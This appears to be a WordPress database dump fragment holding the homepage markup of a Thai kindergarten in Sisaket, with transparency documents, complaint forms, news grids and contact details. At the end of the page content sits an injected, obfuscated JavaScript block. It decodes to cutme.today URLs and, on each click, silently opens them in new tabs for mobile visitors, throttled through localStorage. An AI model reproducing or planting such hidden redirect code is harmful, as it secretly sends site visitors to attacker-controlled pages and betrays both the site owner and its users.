800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:40:09','2025-07-15 07:40:09','',19,'http://watprato.ssk.in.th/?p=686',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
